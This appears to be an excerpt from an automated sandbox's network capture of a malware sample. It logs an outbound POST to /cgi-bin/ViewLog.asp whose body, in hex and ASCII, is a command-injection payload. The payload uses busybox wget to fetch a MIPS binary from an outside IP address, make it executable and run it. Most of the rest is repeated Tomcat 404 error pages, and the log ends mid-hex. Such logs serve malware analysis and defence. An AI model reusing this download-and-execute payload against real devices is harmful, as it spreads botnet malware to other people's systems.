                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              154192.168.2.144823862.162.114.1978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:41.915271044 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:42.128313065 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:48 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:43.227838993 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:48 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:45.423863888 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:48 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:49.825227976 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:48 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:58.624308109 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:48 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 